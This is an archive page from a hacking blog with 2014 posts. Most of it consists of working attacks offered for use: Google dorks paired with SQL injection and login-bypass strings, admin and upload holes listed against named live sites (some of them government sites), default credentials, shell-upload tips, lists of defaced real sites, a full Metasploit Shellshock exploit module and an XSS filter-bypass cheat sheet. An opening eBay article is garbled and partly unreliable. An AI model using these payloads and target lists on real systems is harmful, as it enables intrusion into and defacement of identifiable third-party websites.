Tuesday, September 30, 2014

5 Is Your eBay Account Safe?

12:57:00 PM Under From Admin
[5 Comment]


On the twenty first of May eBay sent an email to its one hundred and forty five million users to change their account password officially confirming that their accounts had been compromised. And that was just the start, hackers found out a way to collect user information data in bulk that is collecting millions of accounts information in a few steps.
Furthermore, even after changing all the passwords on eBay accounts hackers still have all the personal details from millions of eBay users like their names, addresses, land line numbers, cell phone numbers and date of births. But according to eBay no financial information was compromised because they say that all the financial details are kept on entirely different servers.

But the interesting question is how to hack an eBay account? When a user clicks on “forgot password” link – like every other website they are taken to a separate page where it asks for user details and then a random code is generated that is valued as HTML reqinput that can be seen via browsers inspect element tool.


Now, once the user has provided their details they are taken to page where they need to enter their new password two times so that their new password can be saved. Once that is done a confirmation email is sent to them.
Anyhow, because it does not use the secret code, the new password (HTTP) is sent via the same reqinput value that was already generated in the first place when the user clicked to reset their password  and also which the hacker already knows of – the image below shows how exactly what the “reqinput” value looks like:

Also when we come to think of it, even if a person changes the passwords; like eBay told its customers; most of the password reset queries involve information like date of births, madden names, phone numbers and back up emails. So if eBay is saying that the credit card or PayPal information was not leaked or hacked. How long do you think it would take to go to reset password link and provide all the information that is already saved on the hacker’s database.

Furthermore a journalist from Washington Post and a researcher says that an individual is selling eBay users database for just 1.453 BTC (BTC being Bitcoin when converted to United States Dollar which is roughly estimated about $750+) for all those forty five million accounts. But eBay has something different to say about that. eBay says that they have checked the list and the information provided by the individual do not match with eBay’s database. Real or fake information like that can be sold to different people for marketing purposes that comes with the package of those annoying spam emails or possibly even hackers.


by Facebook Comment
Read More »

Sunday, September 28, 2014

1 Powered by "Taylored Ideas" Multi Vulnerabilities

10:29:00 AM Under From Admin
[1 Comment]


Powered by "Taylored Ideas"  Multi Vulnerabilities


Google Dork : "Powered by Taylored Ideas"

The CMS of this website has "SQL Injection" & "Bypass admin Page"

##########[Bypass]##########

Go to : /admin and use '=' 'or' for bypass

##########[SQLi]##########

Go to ?page_id=1[SQL] or ?cmp_id=2[SQL]

####################

[SQLi] :

http://www.tayloredideas.com/page.php?page_id=122'

http://www.wedgeenergyservices.com/links.php?cmp_id=2'

http://www.kocurekindustries.com/index.php?page_id=1'

http://www.southernwhitetailranch.com/index1.php?page_id=1'

http://www.caldwelltx.gov/index1.php?page_id=1'

http://www.co.burleson.tx.us/index.php?page_id=1'

http://www.extremeoutdoors.biz/index.php?page_id=1'

http://wheretoshoplocally.com/index.php?page_id=1'

http://www.beckaconstruction.com/index.php?page_id=1'

http://www.gdigbylaw.com/index.php?page_id=1'

http://www.wildewoodtx.com/index.php?page_id=1'

http://www.icctrophywhitetailranch.com/index.php?page_id=1'

http://www.mymdbcs.com/index.php?page_id=1'

http://www.a1pumpinc.com/index.php?page_id=1'

http://www.elranchocuchara.com/index.php?page_id=1'

####################

[Bypass admin] :

http://www.mexicanhillranch.com/admin

http://extremeoutdoors.biz/admin/

http://www.southernwhitetailranch.com/admin

http://www.zodcat.com/admin

http://www.wheretoshoplocally.com/admin

http://www.paynelandsurveying.com/admin

http://www.gdigbylaw.com/admin/

http://www.icctrophywhitetailranch.com/admin/

http://www.mymdbcs.com/admin/

http://www.a1pumpinc.com/admin/

by Facebook Comment
Read More »

0 Massive defaced by KkK1337 September 27, 2014

12:18:00 AM Under From Admin
[0 Comment]
Massive defaced by KkK1337 September 27, 2014

[+]=========[Defaced]=========[+]

http://www.effeduefocacci.com/default.htm
http://www.elegest.it/default.htm
http://www.eurogomiti.com/default.htm
http://www.giemme.net/default.htm
http://www.grazianodalbarco.it/default.htm
http://www.historicalitalianshoes.com/default.htm
http://www.indiamaivista.com/default.htm
http://www.italianfurs.ru/default.htm
http://www.labortemporis.com/default.htm
http://www.medioevoinarmi.it/default.htm
http://www.mercatomedievale.com/default.htm
http://www.overles.com/default.htm
http://www.panificiobertaccini.com/default.htm
http://www.paolafabbri.it/default.htm
http://www.pellicceriamagnani.it/default.htm
http://www.pretolanicalzature.com/default.htm
http://www.propangasemiliana.com/default.htm
http://www.raf-snc.it/default.htm
http://www.retrostop.it/default.htm
http://www.rotaryforli.com/default.htm
http://www.agenziasansoni.it/default.htm
http://www.avicolaconstanta.com/default.htm
http://www.brighitecnologie.com/default.htm
http://www.casadellautofaenza.com/default.htm
http://www.centrolinguecesena.com/default.htm
http://www.compacarro.org/default.htm
http://www.cooptrecivette.com/default.htm
http://www.defilus.it/default.htm

http://www.domitech.it/default.htm by Facebook Comment
Read More »

Saturday, September 27, 2014

0 Massive defaced by KkK1337 September 27, 2014

11:58:00 PM Under From Admin
[0 Comment]



[+]=========[Defaced]=========[+]
http://capscandinavia.com/
http://closetothelocals.com/
http://e-partners.se/
http://formbyran.com/
http://freshwater4u.com/
http://grammofon.com/
http://healthybusiness.se/
http://industribilder.se/
http://infotechsec.com/
http://inserdesign.com/
http://introteknik.net/
http://lindbergsstugan.se/
http://loviseholm.com/
http://minacious.org/
http://mtginternational.com/
http://orreforsvandrarhem.se/
http://owelution.com/
http://risksolution.us/
http://s1112141.crystone.net/
http://satrabagarn.se/
http://securitysolution.se/
http://sharinginsight.asia/
http://torshallakonstforening.se/
http://tyresoview.com/
http://www.galleristrombom.se/
http://www.cope.nu/
http://www.164club.com/
http://www.164club.org/
http://www.164club.se/
http://www.164list.se/
http://www.abrainfo.se/
http://www.abykonditori.se/
http://www.avelution.com/
http://www.becker-svanberg.se/
http://www.bidra.nu/
http://www.easymining.se/
http://www.bobstevens.se/
http://www.capescandinavia.com/
http://www.capscandinavie.com/
http://www.chezmoiausoleil.com/
http://www.conec.se/
http://abeplastic.com/
http://abeplastic.se/
http://abykonditori.se/
http://alfasolskydd.com/
http://antikvariatrodeorm.se/
http://artoban.com/
http://avelution.com/
http://www.geijer.se/
http://www.eventcompaniet.se/
http://www.grammofon.com/
http://www.healthybusiness.se/
http://www.fixlex.se/
http://www.hellstrom.net/
http://gambiabirds.com/
http://www.historiskabyggen.se/
http://gruterum.se/
http://www.houshtech.se/
http://www.iaodenni.nu/
http://www.imagonova.com/
http://www.introteknik.se/
http://www.jkmt.se/
http://www.kimo.se/
http://www.kommaiform.se/
http://ryet.se/
http://www.lamoni.se/
http://www.lillbillan.se/
http://svalbarddirect.com/
http://www.loviseholm.com/
http://www.medinadesign.biz/
http://www.medisweden.se/
http://www.minacious.org/
http://www.muscleswithstyle.com/
http://www.oronljus.com/
http://www.capscandinavia.com/
http://www.projectconsult.se/
http://www.rphb.se/
http://www.sakerhetsforum.se/
http://www.sanderfastigheter.se/
http://www.satrabagarn.se/
http://www.securitysolution.se/
http://www.sharinginsight.com/
http://www.sharinginsight.se/
http://www.sharinginsights.com/
http://www.si-group.asia/
http://www.stx.se/
http://www.taeng.se/
http://www.taxisolna.se/
http://www.tussilagosmycken.se/
http://www.urolog.se/
http://www.wikipharma.org/
http://www.wipconsulting.eu/

by Facebook Comment
Read More »

0 Apache mod_cgi Bash Environment Variable Code Injection Exploit

7:53:00 PM Under From Admin
[0 Comment]

require 'msf/core'

class Metasploit4 < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Apache mod_cgi Bash Environment Variable Code Injection',
      'Description' => %q{
        This module exploits a code injection in specially crafted environment
        variables in Bash, specifically targeting Apache mod_cgi scripts through
        the HTTP_USER_AGENT variable.
      },
      'Author' => [
        'Stephane Chazelas', # Vulnerability discovery
        'wvu', # Original Metasploit aux module
        'juan vazquez' # Allow wvu's module to get native sessions
      ],
      'References' => [
        ['CVE', '2014-6271'],
        ['URL', 'https://access.redhat.com/articles/1200223'],
        ['URL', 'http://seclists.org/oss-sec/2014/q3/649']
      ],
      'Payload'        =>
        {
          'DisableNops' => true,
          'Space'       => 2048
        },
      'Targets'        =>
        [
          [ 'Linux x86',
            {
              'Platform'        => 'linux',
              'Arch'            => ARCH_X86,
              'CmdStagerFlavor' => [ :echo, :printf ]
            }
          ],
          [ 'Linux x86_64',
            {
              'Platform'        => 'linux',
              'Arch'            => ARCH_X86_64,
              'CmdStagerFlavor' => [ :echo, :printf ]
            }
          ]
        ],
      'DefaultTarget' => 0,
      'DisclosureDate' => 'Sep 24 2014',
      'License' => MSF_LICENSE
    ))

    register_options([
      OptString.new('TARGETURI', [true, 'Path to CGI script']),
      OptEnum.new('METHOD', [true, 'HTTP method to use', 'GET', ['GET', 'POST']]),
      OptInt.new('CMD_MAX_LENGTH', [true, 'CMD max line length', 2048]),
      OptString.new('RPATH', [true, 'Target PATH for binaries used by the CmdStager', '/bin']),
      OptInt.new('TIMEOUT', [true, 'HTTP read response timeout (seconds)', 5])
    ], self.class)
  end

  def check
    res = req("echo #{marker}")

    if res && res.body.include?(marker * 3)
      Exploit::CheckCode::Vulnerable
    else
      Exploit::CheckCode::Safe
    end
  end

  def exploit
    # Cannot use generic/shell_reverse_tcp inside an elf
    # Checking before proceeds
    if generate_payload_exe.blank?
      fail_with(Failure::BadConfig, "#{peer} - Failed to store payload inside executable, please select a native payload")
    end

    execute_cmdstager(:linemax => datastore['CMD_MAX_LENGTH'], :nodelete => true)

    # A last chance after the cmdstager
    # Trying to make it generic
    unless session_created?
      req("#{stager_instance.instance_variable_get("@tempdir")}#{stager_instance.instance_variable_get("@var_elf")}")
    end
  end

  def execute_command(cmd, opts)
    cmd.gsub!('chmod', "#{datastore['RPATH']}/chmod")

    req(cmd)
  end

  def req(cmd)
    send_request_cgi(
      {
        'method' => datastore['METHOD'],
        'uri' => normalize_uri(target_uri.path.to_s),
        'agent' => "() { :;};echo #{marker}$(#{cmd})#{marker}"
      }, datastore['TIMEOUT'])
  end

  def marker
    @marker ||= rand_text_alphanumeric(rand(42) + 1)
  end
end by Facebook Comment
Read More »

Thursday, September 25, 2014

1 Bash Bug could be a bigger threat than Heartbleed

10:20:00 AM Under From Admin
[1 Comment]

“Bash bug, Could be a Nightmare for Linux users”

“Bash Bug” a newly discovered bug present in the Bash or the Bourne again shell ,is  the command-line shell used in most of the Linux and Unix operating systems could be a bigger threat than Heartbleed, Red Hat security team warned.
Bash or the Bourne again shell is a Unix like shell which is widely used to control the command prompt on many Linux computers.
The vulnerability arises from the ability to operate/create a environment variables with specially-crafted values before calling the bash shell.  If bash is configured to as the default system shell, the vulnerability can be triggered by a network–based attackers who can use it to Execute codes/commands to attack servers and devices operating on Linux and Unix OS. leaving behind a backdoor for future attacks in the worst cases.
What “Bash bug Could do ?
A crafted web request targeting a vulnerable CGI application could launch code/command on the server. Similar attacks are possible via OpenSSH, which could allow even restricted secure shell sessions to bypass controls and execute code on the server. DHCP clients invoke shell scripts to configure the system, with values taken from a potentially malicious server. This would allow arbitrary commands to be run, typically as root, on the DHCP client machine. while these are only few of the examples this bug is capable of doing much more.
Why could be Bash Bug a Bigger Threat then Heartbleed ?
“Heartbleed”, the bug which resided in the production versions of OpenSSL allowed attackers to extract user ids/data travelling between the servers and the end users. while the bash bug could lead an attacker to have full control over the system.
The “Bash Bug” has been present in enterprise Linux software from years and affects versions 1.14 through 4.3 of GNU Bash. Red Hat and Fedora have already issued a patch for the bug.
Mac OS X is also effected by the bug, a patch is yet to be released by Apple, though it has just issued an update to “command line tools.”
To check if your Linux or Unix system is Vulnerable:
Type following in a command line
env x=’() { :;}; echo vulnerable’ bash -c “echo this is a test”
In case your system is vulnerable it will show output as:
vulnerable
this is a test
by Facebook Comment
Read More »

0 Sql Injection on CMS AutoWeb v3.0

10:04:00 AM Under From Admin
[0 Comment]
Sql Injection on CMS AutoWeb v3.0

Google Dork : inurl:"mostrar.php?id_noticia="

Exploit : http://www.[target].com/mostrar.php?id_noticia=[SQLi]

Proof of concept :
http://www.cbnmogi.com.br/mostrar.php?id_noticia=2671+and+0+/*!12345union*/+/*!12345select*/+1,version%28%29,database%28
%29,4,user%28%29,6,7,8,9,10--+ <-- Example how to use exploit

Admin Panel: http://www.[target].com/admin/

Another Target : http://fmg.edu.br/mostrar.php?id_noticia=77'


by Facebook Comment
Read More »

Friday, September 19, 2014

1 WordPress wp-store theme remote file upload

1:00:00 AM Under From Admin
[1 Comment]

WordPress wp-store theme remote file upload

Google Dork: inurl:/wp-content/themes/WPstore/

Exploit: /wp-content/themes/WPStore/upload/

Example: http://www.[target].com/wp-content/themes/WPStore/upload/

Live target: http://www.wholisticnutrition.com.au/wp-content/themes/WPStore/upload/

Upload: http://www.wholisticnutrition.com.au/wp-content/uploads/products_img/index.html

You can upload:  .html , .pdf , .jpg ,.gif 

Access to your file: /wp-content/uploads/products_img/



by Facebook Comment
Read More »

Wednesday, September 17, 2014

1 Sitefinity File Upload Vulnerability

8:12:00 PM Under From Admin
[1 Comment]

Google Dork: "/Sitefinity/Login.aspx"

Google Dork: "Sitefinity: Login"


Exploit: /Sitefinity/UserControls/Dialogs/ImageEditorDialog.aspx

Example: http://www.[target].com/Sitefinity/UserControls/Dialogs/ImageEditorDialog.aspx


Live Target: http://www.materprizehome.com.au/Sitefinity/UserControls/Dialogs/ImageEditorDialog.aspx



If you got some problem you can type in comment i will answer

Don't forgot to share on Twitter,Facebook & Google+ Accounts
by Facebook Comment
Read More »

2 WordPress - Plugin easy-comment-uploads Remote File Upload

11:32:00 AM Under From Admin
[2 Comment]


Google Dork : inurl:wp-content/plugins/easy-comment-uploads/upload-form.php

Exploit: wp-content/plugins/easy-comment-uploads/upload-form.php
Example: http://www.[target].com/wp-content/plugins/easy-comment-uploads/upload-form.php
Example: http://www.[target].com/[PATH]/wp-content/plugins/easy-comment-uploads/upload-form.php

Live Target: http://flyguys.net/blog/wp-content/plugins/easy-comment-uploads/upload-form.php

Live Target Upload Dir: http://flyguys.net/blog/wp-content/uploads/2014/09/x.jpg

You can upload: html,txt,gif,jpg,bmp,movie formats. Try with bypassing shell

After upload you can access to your file: 
Example: http://www.[target].com/wp-content/uploads/[YEAR]/[MONTH]/yourfile.txt
Example: http://www.[target].com/wp-content/uploads/2014/09/x.txt

Don't forgot to share on Twitter,Facebook & Google+ Accounts

If you have some problem you can type in comment i will answer

by Facebook Comment
Read More »

1 dotProject Installer Exploit

12:56:00 AM Under From Admin
[1 Comment]

Google Dork: intitle:"dotProject Installer"

Google Dork: intext:"Welcome to the dotProject Installer!"

Google Dork: inurl:"/dotproject/install/index.php"



This exploit will help for installing new database and via control panel or database to join and upload your shell i found 3 dorks what will be very useful.

Don't forgot to share this exploit on your Twitter,Facebook & Google+ Accounts

If you have some problem just type in comment 
by Facebook Comment
Read More »

Tuesday, September 16, 2014

1 Drupal Reinstall CMS and make admin user

10:08:00 PM Under From Admin
[1 Comment]

Drupal Reinstall CMS and make admin user

Google Dork : inurl:/install.php intitle:Select an installation profile | Drupal

Notice: at reinstalling this cms you should make a admin user and password after install you need it to login on user login panel or admin.

If you have some problem you can type in comment i will review and answer

Don't forgot to share this on Twitter,Facebook & Google+ Account


[~] Vulnerability

[~] http://www.[target].com/[PATH]/install.php

[~] http://www.[target].com/install.php


by Facebook Comment
Read More »

Saturday, September 13, 2014

0 Powered bySkaLinks Exploit

4:12:00 PM Under From Admin
[0 Comment]

Google Dork : Powered bySkaLinks - Link Exchange Script.Social software.

Short Exploit. If you got some problems write in comment

login: http://www.[target].com/admin

user : ' or 1=1 or ''='
pass: ' or 1=1 or ''=' by Facebook Comment
Read More »

Friday, September 12, 2014

2 Lokomedia Exploit

4:15:00 PM Under From Admin
[2 Comment]
Lokomedia Exploit

Google Dork : inurl:"admin/foto_berita/"
Google Dork : inurl:"media.php?module="
Google Dork : inurl:/media.php?module=berita
Google Dork : inurl:/admin/content.php?module=user
Google Dork : inurl:/adminweb/

After dorking you will find some target 

http://www.[target].com/admin/content.php?module=user

add: /admin/content.php?module=user

Need to look like this:

You will start editing info or you can just see info and login to page


User: admin Password: wedus
For administration panel you can use: /adminweb , /admin , /administrator

You are able to upload shell via photo with tamper data.

Default admin login for lokomedia:

admin:admin
wiro:sableng
wiros:sabdi
joko:sembung

sinto:gendeng



by Facebook Comment
Read More »

Tuesday, September 9, 2014

0 HTTP Client Response View

11:49:00 AM Under From Admin
[0 Comment]


HTTP Client is just a tool to view HTTP response.

HTTP Client (928 KB) 
Download: http://www.formosaauditor.com/demo/HttpClient.zip by Facebook Comment
Read More »

Monday, September 8, 2014

2 Web Server And WebDAV Tester

11:29:00 AM Under From Admin
[2 Comment]


Web Server And WebDAV Tester, Auto PUT test. 
Please Read readme.txt.

Virus Check:
http://r.virscan.org/report/d5aaa728d91ba0e2a1b410b457e988b0

WebTester.zip (1.15 MB) Download:
http://www.mediafire.com/download/1go64v223ovrpxu/WebTester.zip
by Facebook Comment
Read More »

Sunday, September 7, 2014

0 How to bypass XSS filters

3:35:00 PM Under From Admin
[0 Comment]

Cross-site scripting (XSS) is one of the most common and most exploited security vulnerability on the web. XSS attacks are criticals but often overlooked by administrators.
A XSS vulnerability enables attackers to inject client-side script into a Web page viewed by other users. Web developers make the effort to prevent this vulnerability by filtering text that the user types in to get rid of any script tags or special chars.
In this XSS cheat sheet we will explain some tricks to bypass these protections.

XSS Protections

Several techniques are used to prevent Cross-site scripting.

PHP: str_replace

str_replace — Replace all occurrences of the search string with the replacement string.

This very weak method is often used to strip the script tag.

<?php
    echo 'Your name is ' . str_replace('script', null, $_GET["name"]);
    /*
    page.php?name=Admin
    Output: "Your name is Admin"
    */
?>

The str_replace function is case-sensitive bu HTML is not, you easily bypass this protection by changing the case of your input.
Filtered :
page.php?name=<script>alert('XSS');</script>
Not Filtered :
page.php?name=<ScRiPt>alert('XSS');</ScRiPt>

PHP: htmlentities

htmlentities — Convert all applicable characters to HTML entities.
This protection is pretty efficient against XSS, all characters which have HTML character entity equivalents are translated into these entities.

<?php
    echo "<img alt='Profile' src='".htmlentities($_GET["img"])."' />";
    /*
    page.php?img=photo-1.jpg
    Output: <img alt='Profile' src='photo-1.jpg' />
    */
?>

By default the str_replace function doesn’t convert single quote to HTML entities, this is where we can exploit the vulnerability.
page.php?img=.' onerror='alert("XSS")

Bypass XSS filter using data URIs

The data URI scheme is a (Uniform Resource Identifier scheme that provides a way to include data in-line in web pages as if they were external resources.
We will see how data URIs can be used to perform Cross-site scripting attacks.

Data URI format

data:[][;charset=][;base64],<data>

Data URI example

<img src="data:image/bmp;base64,Qk1+AAAAAAAAAD4AAAAoAAAAPAAAAAgAAAABAAEAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP///wDOduQTZPIbkM52zPIm99swxHbM8iYHynCUNhzypmcYcJW2zDCHbjjwsbbs8ccO+nCxtuzxx477MDmWDDHnnhuQ" alt="Wiremask" />

Scope

Data URI can be used with very few HTML tags, we are limited to exploit only the following tags :
  • object
  • img
  • a
  • iframe
Using Data URI as XSS vector, sometime you can bypass the htmlspecialchars PHP function.


<?php
    echo '<object data="'.htmlspecialchars($_GET['img']).'"></object>';
    /*
    page.php?img=data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD4=
    Output: <object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD4="></object>
    */
?>

We inject our base64 encoded payload <script>alert("XSS")</script> in the object data.
You code will be executed when the DOM initialize your object element.
by Facebook Comment
Read More »